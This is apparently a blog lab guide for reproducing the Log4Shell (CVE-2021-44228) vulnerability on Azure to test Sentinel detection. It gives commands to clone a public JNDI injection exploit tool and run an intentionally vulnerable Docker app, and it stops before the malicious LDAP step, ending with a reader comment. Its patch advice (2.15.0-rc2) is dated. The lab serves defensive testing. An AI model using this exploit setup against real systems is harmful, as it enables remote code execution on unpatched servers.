The following post will guide creating a short Log4j lab to simulate the recent Log4j vulnerability on your Azure environment – Log4j LAB & Sentinel Detection. Remember, set up this lab in a dedicated environment to check your security control and not inside the production environment.
Log4J Overview
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified as being exploited in the wild. PoC code was released, and subsequent investigation revealed that exploitation was effortless to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker can instruct that system to download and subsequently execute a malicious payload.
Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking out and exploiting unpatched systems. Due to the discovery of this exploit being so recent, many servers, both on-premises and within cloud environments, have yet to be patched. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 for all systems.
Image credit: GovCERT
CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 — the highest possible severity rating.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints,” the description reads. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
LAB Setup
To run the Log4j lab, you need the following requirements, setup, and command:
Requirements
- Azure Subscription
- Kali Linux VM
- Docker installation and quick setup
- Download the JINDIExploit
LAB Set
Create Kali VM based on Kali Linux On Azure – Install Guide
Install Docker with the Azure CLI How to run Azure CLI in a Docker Container
Download and run the JNDI Exploit (from this repo or any others)
welk1n/JNDI-Injection-Exploit
wget https://github.com/welk1n/JNDI-Injection-Exploit.git
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
Then, run the vulnerable web application:
sudo docker run –name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
The Exploit
Make sure the docker spring boot web application is running.
sudo docker ps
Next, open a terminal window, setup the JNDI Exploit malicious LDAP server:
Doesn’t seem that Kali is really in the Azure Marketplace anymore. I only see “Kali GUI Linux by Techlatest.net”
Like any other cloud component, this feature changed under Kali GUI Linux by Techlatest.net.
The post will update soon with the latest options to install Kali on Azure.
Elli.